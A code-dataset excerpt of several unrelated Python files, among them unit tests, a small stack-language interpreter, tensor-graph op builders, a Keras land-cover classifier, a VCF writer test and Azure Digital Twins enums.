test_add_model_components(self): """ Test that there are no errors when adding model components :return: """ create_abstract_model(prereq_modules=IMPORTED_PREREQ_MODULES, module_to_test=MODULE_BEING_TESTED, test_data_dir=TEST_DATA_DIRECTORY, subproblem="", stage="" ) def test_load_model_data(self): """ Test that data are loaded with no errors :return: """ add_components_and_load_data(prereq_modules=IMPORTED_PREREQ_MODULES, module_to_test=MODULE_BEING_TESTED, test_data_dir=TEST_DATA_DIRECTORY, subproblem="", stage="" ) def test_data_loaded_correctly(self): """ Test that the data loaded are as expected :return: """ m, data = add_components_and_load_data( prereq_modules=IMPORTED_PREREQ_MODULES, module_to_test=MODULE_BEING_TESTED, test_data_dir=TEST_DATA_DIRECTORY, subproblem="", stage="" ) instance = m.create_instance(data) # Set: GEN_NEW_LIN_VNTS expected_gen_vintage_set = sorted([ ("Gas_CCGT_New", 2020), ("Gas_CCGT_New", 2030), ("Gas_CT_New", 2030) ]) actual_gen_vintage_set = sorted( [(prj, period) for (prj, period) in instance.GEN_NEW_LIN_VNTS ] ) self.assertListEqual(expected_gen_vintage_set, actual_gen_vintage_set) # Params: gen_new_lin_lifetime_yrs_by_vintage expected_lifetime = OrderedDict( sorted( {("Gas_CCGT_New", 2020): 30, ("Gas_CCGT_New", 2030): 30, ("Gas_CT_New", 2030): 30}.items() ) ) actual_lifetime = OrderedDict( sorted( {(prj, vintage): instance.gen_new_lin_lifetime_yrs_by_vintage[prj, vintage] for (prj, vintage) in instance.GEN_NEW_LIN_VNTS }.items() ) ) self.assertDictEqual(expected_lifetime, actual_lifetime) # Params: gen_new_lin_annualized_real_cost_per_mw_yr expected_cost = OrderedDict( sorted( {("Gas_CCGT_New", 2020): 200000, ("Gas_CCGT_New", 2030): 180000, ("Gas_CT_New", 2030): 140000}.items() ) ) actual_cost = OrderedDict( sorted( {(prj, v): instance.gen_new_lin_annualized_real_cost_per_mw_yr[prj, v] for (prj, v) in instance.GEN_NEW_LIN_VNTS }.items() ) ) self.assertDictEqual(expected_cost, actual_cost) # Set: GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT expected_gen_vintage_min_set = sorted([ ("Gas_CT_New", 2030) ]) actual_gen_vintage_min_set = sorted( [(prj, period) for (prj, period) in instance.GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT ] ) self.assertListEqual(expected_gen_vintage_min_set, actual_gen_vintage_min_set) # Params: gen_new_lin_min_cumulative_new_build_mw expected_min_new_mw = OrderedDict( sorted( {("Gas_CT_New", 2030): 10}.items() ) ) actual_min_new_mw = OrderedDict( sorted( {(prj, v): instance.gen_new_lin_min_cumulative_new_build_mw[prj, v] for (prj, v) in instance.GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT }.items() ) ) self.assertDictEqual(expected_min_new_mw, actual_min_new_mw) # Set: GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT expected_gen_vintage_max_set = sorted([ ("Gas_CCGT_New", 2020), ("Gas_CCGT_New", 2030) ]) actual_gen_vintage_max_set = sorted( [(prj, period) for (prj, period) in instance.GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT ] ) self.assertListEqual(expected_gen_vintage_max_set, actual_gen_vintage_max_set) # Params: gen_new_lin_max_cumulative_new_build_mw expected_max_new_mw = OrderedDict( sorted( {("Gas_CCGT_New", 2020): 20, ("Gas_CCGT_New", 2030): 20}.items() ) ) actual_max_new_mw = OrderedDict( sorted( {(prj, v): instance.gen_new_lin_max_cumulative_new_build_mw[prj, v] for (prj, v) in instance.GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT }.items() ) ) self.assertDictEqual(expected_max_new_mw, actual_max_new_mw) def test_derived_data(self): """ Calculations :return: """ m, data = add_components_and_load_data( prereq_modules=IMPORTED_PREREQ_MODULES, module_to_test=MODULE_BEING_TESTED, test_data_dir=TEST_DATA_DIRECTORY, subproblem="", stage="" ) instance = m.create_instance(data) # Set: OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE expected_periods_by_gen_vintage = { ("Gas_CCGT_New", 2020): [2020, 2030], ("Gas_CCGT_New", 2030): [2030], ("Gas_CT_New", 2030): [2030] } actual_periods_by_gen_vintage = { (prj, v): [period for period in instance.OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE[prj, v]] for (prj, v) in instance.OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE } self.assertDictEqual(expected_periods_by_gen_vintage, actual_periods_by_gen_vintage) # Set: GEN_NEW_LIN_OPR_PRDS expected_gen_op_periods = [ ("Gas_CCGT_New", 2020), ("Gas_CCGT_New", 2030), ("Gas_CT_New", 2030) ] actual_gen_op_periods = sorted([ (prj, period) for (prj, period) in instance.GEN_NEW_LIN_OPR_PRDS ]) self.assertListEqual(expected_gen_op_periods, actual_gen_op_periods) # Set: GEN_NEW_LIN_VNTS_OPR_IN_PERIOD expected_gen_vintage_op_in_period = { 2020: [("Gas_CCGT_New", 2020)], 2030: [("Gas_CCGT_New", 2020), ("Gas_CCGT_New", 2030), ("Gas_CT_New", 2030)] } actual_gen_vintage_op_in_period = { p: [(g, v) for (g, v) in sorted(instance.GEN_NEW_LIN_VNTS_OPR_IN_PERIOD[p]) ] for p in sorted(instance.PERIODS) } self.assertDictEqual(expected_gen_vintage_op_in_period, actual_gen_vintage_op_in_period) if __name__ == "__main__": unittest.main()
StarcoderdataPython
3234041
<reponame>nmorse/pounce<gh_stars>1-10 #import board #import pulseio # from analogio import AnalogIn #from digitalio import DigitalInOut, Direction, Pull #import time # import random import joyish_tests as testing import joyish_parser as jp # Digital input with pullup #red = DigitalInOut(board.D13) red = {} red['value'] = 0 #red.direction = Direction.OUTPUT #green = DigitalInOut(board.D2) #green.direction = Direction.OUTPUT # ToDo: # ui/repl def _readIO(s, pl): global red s.append({'red': red['value']}) return [s, pl] def _writeIO(s, pl): global red a = s.pop() red['value'] = a['red'] return [s, pl] def _dup(s, pl): a = s.pop() s.append(a) s.append(a) return [s, pl] def _add(s, pl): a = s.pop() b = s.pop() s.append(a + b) return [s, pl] def _sub(s, pl): a = s.pop() b = s.pop() s.append(b - a) return [s, pl] def _prod(s, pl): a = s.pop() b = s.pop() s.append(a * b) return [s, pl] def _n_prod(s, pl): if len(s) >= 2: a = s.pop() b = s.pop() if isNumber(a) and isNumber(b): s.append(a * b) pl.insert(0, 'n*') return [s, pl] else: s.append(b) s.append(a) return [s, pl]; def _eq(s, pl): a = s.pop() b = s.pop() s.append(a == b) return [s, pl] def _ift(s, pl): then_block = s.pop() expression = s.pop() if expression: if isArray(then_block): pl = then_block+pl else: pl.insert(0, then_block) return [s, pl] def _ifte (s, pl): else_block = s.pop() then_block = s.pop() expression = s.pop() if expression: if isArray(then_block): #print(then_block) pl = then_block+pl else: pl.insert(0, then_block) else: if isArray(else_block): pl = else_block+pl else: pl.insert(0, else_block) return [s, pl] def _get(s, l): # (dict key -- dict value) key = s.pop() dictionary = s[-1] s.append(dictionary[key]) return [s, l] def _set(s, l): # (dict value key -- dict) key = s.pop() value = s.pop() dictionary = s[-1] dictionary[key] = value return [s, l] def _apply(s, l): # (dict key fun -- dict) fun = s.pop() key = s[-1] s, l = _get(s, l) s = run(fun, s) s.append(key) s, l = _set(s, l) return [s, l] def _swap(s, l): a = s.pop() b = s.pop() s.append(a) s.append(b) return [s, l] def _drop(s, l): a = s.pop() return [s, l] words = { '>io': _readIO, '<io': _writeIO, 'dup': _dup, '+': _add, '-': _sub, '*': _prod, 'n*': _n_prod, '==': _eq, 'if': _ift, 'if-else': _ifte, 'get': _get, 'set': _set, 'app': _apply, 'swap': _swap, 'drop': _drop, 'toggle': '[0 1 if-else] app', 'count-down': 'dup 1 - [ dup 1 - count-down ] if', 'fact': 'count-down n*' } #program_list = '1 redLED 1 greenLED' #program_list = '1 redLED 1.5 0 1--redLED timeOut' #program_list = ' 1 redLED 1 0 1--redLED if-then 1 1 1--redLED if-then' #program_list = ' 0 redLED 1 1 1--redLED if-then' #program_list = ' 1 0 1--redLED 1 1--redLED if-then-else' def isTrue(e): if e != 0 and e != False and e != 'False' and e != 'false': return True return False def isValue(e, fun): return (isinstance(e, int) or isinstance(e, float) or isinstance(e, bool) or (isinstance(e, str) and not e in fun.keys())) def isNumber(e): return isinstance(e, int) or isinstance(e, float) def isArray(a): return isinstance(a, (list,)) def isDict(a): return isinstance(a, (dict,)) #from inspect import isfunction def isfunction(candidate): return not (isinstance(candidate, str) or isinstance(candidate, (list,))) #def number_or_str(s): # try: # return int(s) # except ValueError: # try: # return float(s) # except ValueError: # if s == 'True': # return 'True' # if s == 'False': # return 'False' # return s def cmpLists(a, b): same = True if len(a) == len(b): for i in range(len(a)): if a[i] != b[i]: same = False else: same = False return same def runScript(program_script, vs): pl = jp.parse(program_script) return run(pl, vs) def run(pl, vs): global words while pl != None and len(pl) > 0: next = pl[0]; pl = pl[1:] print(vs, next) if isValue(next, words) or isArray(next) or isDict(next): if next == 'true': vs.append(True) elif next == 'false': vs.append(False) else: vs.append(next) elif next in words.keys(): #print(vs, next, pl) if isfunction(words[next]): (vs, pl) = words[next](vs, pl) else: if isinstance(words[next], str): pl = jp.parse(words[next]) + pl else: pl = words[next] + pl else: print('unknown term or word:', next) return vs print('so far so good... ready to:') # tests def runTests(): print('Starting tests:') testCount = 0 testsFailed = 0 for test in testing.tests: ps = test[0] expected_stack = test[1] result_stack = runScript(ps, []) testCount += 1 if not cmpLists(result_stack, expected_stack): testsFailed += 1 print(result_stack, ' expected:', expected_stack) print('---- Failed test for: ', ps) break if testsFailed == 0: print('All', testCount, 'tests passed.') runTests() #while True: #loop forever #print(red) #run(['>io', 'red', 'toggle', '<io'], []) #print (red) #rs = read_rotor() #if rs == 1 or rs == -1: # stack.append(str(rs)) # stack.append('rotary') # run(stack, words)
StarcoderdataPython
1729198
from ..graph import get_default_graph from ..tensors import * from ..ops.array_ops import * from ..ops.ctrl_ops import * from ..ops.constant import * from ..ops.math_ops import * from ..ops.placeholder import * from ..ops.variable import * def constant(name, out_shape, value=None, graph=None): if graph is None: graph = get_default_graph() const_op = ConstantOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) const_op.addOutput(out_tensor) graph.addOp(const_op) if value is not None: out_tensor.setValue(value) return out_tensor def concat(name, out_shape, input_list, axis=0, graph=None): if graph is None: graph = get_default_graph() if not isinstance(axis, int): raise NotImplementedError( 'catamount.concat axis yet unsupported type: {}'.format(type(axis))) concat_op = ConcatOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) concat_op.addOutput(out_tensor) graph.addOp(concat_op) for input in input_list: graph.addInputToOp(concat_op, input) # Finally, add the axis input tensor last (rank 0) axis_tensor = constant('{}:axis'.format(name), [], axis) graph.addInputToOp(concat_op, axis_tensor) return out_tensor def dynamic_stitch(name, out_shape, indices_list=None, data_list=None, graph=None): if graph is None: graph = get_default_graph() dynstitch_op = DynamicStitchOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) dynstitch_op.addOutput(out_tensor) graph.addOp(dynstitch_op) for input in indices_list: graph.addInputToOp(dynstitch_op, input) for input in data_list: graph.addInputToOp(dynstitch_op, input) return out_tensor def enter(name, input, graph=None): if graph is None: graph = get_default_graph() enter_op = EnterOp(name) out_tensor = Tensor(name, TensorShape(input.shape)) enter_op.addOutput(out_tensor) graph.addOp(enter_op) graph.addInputToOp(enter_op, input) return out_tensor def expanddims(name, out_shape, input, axis=0, graph=None): if graph is None: graph = get_default_graph() if not isinstance(axis, int): raise NotImplementedError( 'catamount.expanddims axis yet unsupported type: {}' .format(type(axis))) expanddims_op = ExpandDimsOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) expanddims_op.addOutput(out_tensor) graph.addOp(expanddims_op) graph.addInputToOp(expanddims_op, input) # Finally, add the axis input tensor last (rank 0) axis_tensor = constant('{}:axis'.format(name), [], axis) graph.addInputToOp(expanddims_op, axis_tensor) return out_tensor def matmul(name, out_shape, in_a, in_b, graph=None): if graph is None: graph = get_default_graph() mm_op = MatMulOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) mm_op.addOutput(out_tensor) graph.addOp(mm_op) graph.addInputToOp(mm_op, in_a) graph.addInputToOp(mm_op, in_b) return out_tensor def placeholder(name, out_shape, graph=None): if graph is None: graph = get_default_graph() ph_op = PlaceholderOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) ph_op.addOutput(out_tensor) graph.addOp(ph_op) return out_tensor def pointwise(name, op_type, out_shape, in_a, in_b=None, graph=None): if graph is None: graph = get_default_graph() op = op_type(name) out_tensor = Tensor(name, TensorShape(out_shape)) op.addOutput(out_tensor) graph.addOp(op) graph.addInputToOp(op, in_a) if in_b is not None: graph.addInputToOp(op, in_b) return out_tensor def reduce(name, op_func, out_shape, input, axes=0, graph=None): if graph is None: graph = get_default_graph() op = ReduceOp(name, axes=axes) out_tensor = Tensor(name, TensorShape(out_shape)) op.addOutput(out_tensor) graph.addOp(op) graph.addInputToOp(op, input) return out_tensor def split(name, out_shape, input, size_splits=None, axis=0, num_split=2, graph=None): if graph is None: graph = get_default_graph() if size_splits is not None: raise NotImplementedError('Split needs to handle size_splits {}' .format(size_splits)) # Instantiate op split_op = SplitOp(name) # Add num_split attribute if not isinstance(num_split, int): raise NotImplementedError('num_split of type {}' .format(type(num_split))) split_op.setNumSplit(num_split) # Add output tensors out_tensors = [] for i in range(num_split): out_name = '{}_out{}'.format(name, i) out_tensors.append(Tensor(out_name, TensorShape(out_shape))) split_op.addOutput(out_tensors[i]) graph.addOp(split_op) # Add inputs (tensor to split, size_splits, axis) graph.addInputToOp(split_op, input) if size_splits is None: # Pass scalar 0 as indicator that split should use num_split # attribute instead of size_splits size_splits_tensor = constant('{}_size_splits'.format(name), out_shape=[], value=0) else: assert isinstance(size_splits, Tensor) size_splits_tensor = size_splits graph.addInputToOp(split_op, size_splits_tensor) if isinstance(axis, int): axis_tensor = constant('{}_axis'.format(name), out_shape=[], value=axis) else: assert isinstance(axis, Tensor) axis_tensor = axis graph.addInputToOp(split_op, axis_tensor) return out_tensors def variable(name, out_shape, graph=None): if graph is None: graph = get_default_graph() var_op = VariableOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) var_op.addOutput(out_tensor) graph.addOp(var_op) return out_tensor
StarcoderdataPython
198832
<reponame>belovachap/pyvsystems_rewards<gh_stars>1-10 def format_as_vsys(amount): abs_amount = abs(amount) whole = int(abs_amount / 100000000) fraction = abs_amount % 100000000 if amount < 0: whole *= -1 return f'{whole}.{str(fraction).rjust(8, "0")}'
StarcoderdataPython
3354314
from .connections import get_current_connection from .connections import use_connection, push_connection, pop_connection from .connections import Connection from .queue import Queue, get_failed_queue from .job import cancel_job, requeue_job from .worker import Worker from .version import VERSION __all__ = [ 'use_connection', 'get_current_connection', 'push_connection', 'pop_connection', 'Connection', 'Queue', 'get_failed_queue', 'Worker', 'cancel_job', 'requeue_job'] __version__ = VERSION
StarcoderdataPython
3365236
#!/usr/bin/env python3 #coding=utf-8 # seq include tuple and list t1 = (2, 1.2, 'love', False) # 不可变 l1 = [1, True, 'smile'] print(t1, type(t1)) print(l1, type(l1)) print(t1[:]) print(t1[:1]) print(t1[1:]) print(t1[-1]) print(l1[:]) print(l1[:1]) print(l1[1:]) print(l1[-1]) # string is spec tuple str = 'bacckd' print(str[2:4])
StarcoderdataPython
1651385
<reponame>nicoladimauro/TiSeLaC-ECMLPKDD17 import numpy as np np.random.seed(1379) from keras.utils import plot_model from sklearn.neighbors import BallTree from sklearn import preprocessing from sklearn import svm from sklearn.metrics import confusion_matrix, f1_score, classification_report from sklearn.model_selection import train_test_split from sklearn.utils.class_weight import compute_class_weight, compute_sample_weight from sklearn.linear_model import LogisticRegression as LR from collections import Counter from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Merge, Activation, Conv1D, MaxPooling1D from keras.layers.normalization import BatchNormalization from keras.preprocessing.image import ImageDataGenerator import keras from keras import backend as K from keras.layers.advanced_activations import PReLU, ELU from keras.optimizers import SGD from keras import regularizers import my_callbacks from models import build_conv_models ### load data train_coord = np.loadtxt("data/coord_training.txt", delimiter=',') X_train_ = np.loadtxt('data/training.txt.gz', delimiter=",") y_train = np.loadtxt("data/training_class.txt") X_test_ = np.loadtxt('data/test.txt', delimiter=",") test_coord = np.loadtxt("data/coord_test.txt", delimiter=',') y_test = np.loadtxt("data/test.cl") num_classes = 9 ### build the complete spatial feature descriptor kdt = BallTree(train_coord, leaf_size=30, metric='euclidean') train_neigh = np.empty(shape=(1, 0)) test_neigh = np.empty(shape=(1, 0)) e_X_train = X_train_.reshape(X_train_.shape[0], 23, 10) e_X_train = np.transpose(e_X_train, (0, 2, 1)) e_X_test = X_test_.reshape(X_test_.shape[0], 23, 10) e_X_test = np.transpose(e_X_test, (0, 2, 1)) for radius in [1, 3, 5, 7, 9, 11, 13, 15, 17]: print('computing ball for radius {}'.format(radius)) train_neighbors = kdt.query_radius(train_coord, r=radius) test_neighbors = kdt.query_radius(test_coord, r=radius) neig = [] for i in range(X_train_.shape[0]): mask_ = train_neighbors[i] index = np.argwhere(mask_ == i) mask = np.delete(mask_, index) classes = y_train[mask] unique, counts = np.unique(classes, return_counts=True) N = [0] * num_classes for j in range(len(unique)): N[int(unique[j] - 1)] = counts[j] if len(mask) < 1: N.extend([0., 0., 0., 0., 0., 0.]) else: N_i = e_X_train[mask] N.append(np.mean(N_i[:, 7]) + 0.001) N.append(np.std(N_i[:, 7]) + 0.001) N.append(np.mean(N_i[:, 8]) + 0.001) N.append(np.std(N_i[:, 8]) + 0.001) N.append(np.mean(N_i[:, 9]) + 0.001) N.append(np.std(N_i[:, 9]) + 0.001) neig.append(N) if (radius == 1): train_neigh = np.array(neig) else: train_neigh = np.concatenate((train_neigh, np.array(neig)), axis=1) neig = [] for i in range(X_test_.shape[0]): mask_ = test_neighbors[i] index = np.argwhere(mask_ == i) mask = np.delete(mask_, index) classes = y_train[mask] unique, counts = np.unique(classes, return_counts=True) N = [0] * num_classes for j in range(len(unique)): N[int(unique[j] - 1)] = counts[j] if len(mask) < 1: N.extend([0., 0., 0., 0., 0., 0.]) else: N_i = e_X_train[mask] N.append(np.mean(N_i[:, 7]) + 0.001) N.append(np.std(N_i[:, 7]) + 0.001) N.append(np.mean(N_i[:, 8]) + 0.001) N.append(np.std(N_i[:, 8]) + 0.001) N.append(np.mean(N_i[:, 9]) + 0.001) N.append(np.std(N_i[:, 9]) + 0.001) neig.append(N) if (radius == 1): test_neigh = np.array(neig) else: test_neigh = np.concatenate((test_neigh, np.array(neig)), axis=1) train_neigh = np.concatenate((train_neigh, train_coord), axis=1) test_neigh = np.concatenate((test_neigh, test_coord), axis=1) X_train_aggr = np.reshape(X_train_, (-1, 10)) X_test_aggr = np.reshape(X_test_, (-1, 10)) ### scaling scaler = preprocessing.StandardScaler().fit(X_train_aggr) X_train = scaler.transform(X_train_aggr) X_test = scaler.transform(X_test_aggr) X_train = np.reshape(X_train, (-1, 230)) X_test = np.reshape(X_test, (-1, 230)) X_train_t = np.reshape(X_train, (X_train.shape[0], 230, 1)) X_test_t = np.reshape(X_test, (X_test.shape[0], 230, 1)) X_train = X_train.reshape(X_train.shape[0], 23, 10) X_test = X_test.reshape(X_test.shape[0], 23, 10) input_shape = (23, 10) scaler = preprocessing.StandardScaler().fit(train_neigh) X_train_neigh = scaler.transform(train_neigh) X_test_neigh = scaler.transform(test_neigh) lb = preprocessing.LabelBinarizer() lb.fit(y_train) y_train = lb.transform(y_train) y_test = lb.transform(y_test) ### spectral model spectral_model = Sequential() spectral_model.add( Conv1D(filters=32, kernel_size=3, input_shape=input_shape, activation='relu', padding='same')) spectral_model.add(Conv1D(filters=32, kernel_size=3, activation='relu', padding='same')) spectral_model.add(Flatten()) ch_models = [] ch_maps = [] input_list = [] n_models = 10 for t in range(n_models): map_ch = [i * 10 + t for i in range(23)] ch_maps.append(map_ch) TRAIN = [X_train] + [X_train_t[:, ch_maps[i]] for i in range(n_models)] + [X_train_neigh] TEST = [X_test] + [X_test_t[:, ch_maps[i]] for i in range(n_models)] + [X_test_neigh] spectral_model2, layers = build_conv_models(n_models=10, input_shape=(23, 1)) relational_model = Sequential() relational_model.add(Dense(128, input_shape=(X_train_neigh.shape[1],), activation='relu')) relational_model.add(Dropout(0.3)) relational_model.add(Dense(64, activation='relu')) relational_model.add(Dropout(0.3)) complete_model = Sequential() complete_model.add(Merge([spectral_model, spectral_model2, relational_model], mode='concat')) complete_model.add(Dense(9, activation='softmax')) complete_model.compile(loss='categorical_crossentropy', optimizer=keras.optimizers.Adam(), metrics=['accuracy']) plot_model(complete_model, to_file='model.png', show_shapes=True, show_layer_names=False) complete_model.fit(TRAIN, y_train, batch_size=32, epochs=7, verbose=1) print("Train") y_pred_proba = complete_model.predict(TRAIN) y_pred = np.argmax(y_pred_proba, axis=1) + 1 y_train_ = np.argmax(y_train, axis=1) + 1 #print(confusion_matrix(y_train_, y_pred)) #print(classification_report(y_train_, y_pred)) print("f1 score micro: ", f1_score(y_train_, y_pred, average='micro')) print("f1 score macro: ", f1_score(y_train_, y_pred, average='macro')) print("f1 score weighted: ", f1_score(y_train_, y_pred, average='weighted')) lr = LR() lr.fit(y_pred_proba, y_train_) y_pred = lr.predict(y_pred_proba) print("Train LR") #print(confusion_matrix(y_train_, y_pred)) #print(classification_report(y_train_, y_pred)) print("f1 score micro: ", f1_score(y_train_, y_pred, average='micro')) print("f1 score macro: ", f1_score(y_train_, y_pred, average='macro')) print("f1 score weighted: ", f1_score(y_train_, y_pred, average='weighted')) print("Test") y_pred_proba = complete_model.predict(TEST) y_pred = np.argmax(y_pred_proba, axis=1) + 1 np.savetxt("baML.txt", y_pred, fmt="%.1f", delimiter="\n") y_test_ = np.argmax(y_test, axis=1) + 1 #print(confusion_matrix(y_test_, y_pred)) #print(classification_report(y_test_, y_pred)) print("f1 score micro: ", f1_score(y_test_, y_pred, average='micro')) print("f1 score macro: ", f1_score(y_test_, y_pred, average='macro')) print("f1 score weighted: ", f1_score(y_test_, y_pred, average='weighted')) lr = LR() lr.fit(y_pred_proba, y_test_) y_pred = lr.predict(y_pred_proba) print("Test LR") #print(confusion_matrix(y_test_, y_pred)) #print(classification_report(y_test_, y_pred)) print("f1 score micro: ", f1_score(y_test_, y_pred, average='micro')) print("f1 score macro: ", f1_score(y_test_, y_pred, average='macro')) print("f1 score weighted: ", f1_score(y_test_, y_pred, average='weighted'))
StarcoderdataPython
32562
<reponame>underworlds-robot/uwds3_core<gh_stars>1-10 import cv2 class DenseOpticalFlowEstimator(object): def __init__(self): self.previous_frame = None def estimate(self, frame): if first_frame is None: return None gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) flow = cv2.calcOpticalFlowFarneback(self.previous_frame, gray, None, 0.5, 1, 20, 1, 5, 1.2, 0) self.previous_frame = gray return flow
StarcoderdataPython
3309746
import unittest from reuse_func import GetData class InfraTransformer(unittest.TestCase): def test_infra_transformer_runningcount(self): cal = GetData() runningcount = cal.get_runningCount("infra_transformer") if runningcount == 0: print("infra data transformer running count is 0 after installation") else: self.assertEqual(0,runningcount,"infra data transformer running count is not 0 after installation") def test_infra_transformer_disabledCount(self): cal = GetData() disabledCount = cal.get_disabledCount("crc_transformer") if disabledCount == 0: print("infra data transformer disabled count is 0 after installation") else: self.assertEqual(0,disabledCount,"infra data transformer disabled count is not 0 after installation") def test_infra_transformer_invalidCount(self): cal = GetData() invalidCount = cal.get_invalidCount("crc_transformer") if invalidCount == 0: print("infra data transformer invalid count is 0 after installation") else: self.assertEqual(0,invalidCount,"infra data transformer invalid count is not 0 after installation") def test_infra_transformer_stoppedCount(self): cal = GetData() stopped = cal.get_stoppedCount("crc_transformer") if stopped == 0: self.assertNotEqual(0,stopped,"infra data transformer stopped count should not be 0 after installation") else: print("infra data transformer stopped count is"+" "+str(stopped)+" "+"after installation") if __name__ == '__main__': unittest.main()
StarcoderdataPython
3393400
# All content Copyright (C) 2018 Genomics plc from io import StringIO import unittest import datetime from wecall.vcfutils.schema import Schema from wecall.vcfutils.writer import encode_VCF_string, VCFWriter class TestVCFWriter(unittest.TestCase): def test_should_write_empty_file_containing_expected_version_number(self): mock_file = StringIO() empty_schema = Schema() writer = VCFWriter(mock_file) writer.write_header(empty_schema) expected_file = '##fileformat=VCFv4.2\n#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_file_metadata_in_expected_format(self): mock_file = StringIO() date = datetime.datetime.utcnow().strftime('%F') schema = Schema() schema.file_metadata['fileDate'] = date writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##fileDate={date!s}\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' \ .format(date=date) self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_info_data_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_info_data('key', '1', 'String', 'sample info field') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##INFO=<ID=key,Number=1,Type=String,Description="sample info field">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_sample_data_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_sample_data('key', '1', 'String', 'a sample field') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##FORMAT=<ID=key,Number=1,Type=String,Description="a sample field">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_filter_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_filter('key', 'a filter') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##FILTER=<ID=key,Description="a filter">\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_contig_in_expected_format(self): mock_file = StringIO() schema = Schema() schema.set_contig('key', 666) writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '##contig=<ID=key,length=666>\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n' self.assertEqual(expected_file, mock_file.getvalue()) def test_should_write_sample_names_in_column_header_line(self): mock_file = StringIO() schema = Schema() schema.samples.append('FOO') writer = VCFWriter(mock_file) writer.write_header(schema) expected_file = '##fileformat=VCFv4.2\n' \ '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tFOO\n' self.assertEqual(expected_file, mock_file.getvalue()) class TestVCFStringWriting(unittest.TestCase): def test_should_encode_empty_VCF_string(self): self.assertEqual('""', encode_VCF_string('')) def test_should_encode_simple_VCF_string(self): self.assertEqual('"foo"', encode_VCF_string('foo')) def test_should_encode_VCF_string_with_single_double_quote(self): self.assertEqual('"\\""', encode_VCF_string('"')) def test_should_encode_VCF_string_with_single_backslash(self): self.assertEqual('"\\\\"', encode_VCF_string('\\')) def test_should_encode_complex_VCF_string(self): self.assertEqual( '"abc\\\\def\\\"ghi"', encode_VCF_string('abc\\def"ghi'))
StarcoderdataPython
1750554
<reponame>vincenttran-msft/azure-sdk-for-python # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from enum import Enum from six import with_metaclass from azure.core import CaseInsensitiveEnumMeta class AuthenticationType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """Specifies the authentication type being used for connecting to the endpoint. """ KEY_BASED = "KeyBased" IDENTITY_BASED = "IdentityBased" class ConnectionPropertiesProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The provisioning state. """ PENDING = "Pending" APPROVED = "Approved" REJECTED = "Rejected" DISCONNECTED = "Disconnected" class DigitalTwinsIdentityType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The type of Managed Identity used by the DigitalTwinsInstance. Only SystemAssigned is supported. """ NONE = "None" SYSTEM_ASSIGNED = "SystemAssigned" class EndpointProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The provisioning state. """ PROVISIONING = "Provisioning" DELETING = "Deleting" SUCCEEDED = "Succeeded" FAILED = "Failed" CANCELED = "Canceled" DELETED = "Deleted" WARNING = "Warning" SUSPENDING = "Suspending" RESTORING = "Restoring" MOVING = "Moving" DISABLED = "Disabled" class EndpointType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The type of Digital Twins endpoint """ EVENT_HUB = "EventHub" EVENT_GRID = "EventGrid" SERVICE_BUS = "ServiceBus" class PrivateLinkServiceConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The status of a private endpoint connection. """ PENDING = "Pending" APPROVED = "Approved" REJECTED = "Rejected" DISCONNECTED = "Disconnected" class ProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """The provisioning state. """ PROVISIONING = "Provisioning" DELETING = "Deleting" UPDATING = "Updating" SUCCEEDED = "Succeeded" FAILED = "Failed" CANCELED = "Canceled" DELETED = "Deleted" WARNING = "Warning" SUSPENDING = "Suspending" RESTORING = "Restoring" MOVING = "Moving" class PublicNetworkAccess(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): """Public network access for the DigitalTwinsInstance. """ ENABLED = "Enabled" DISABLED = "Disabled" class 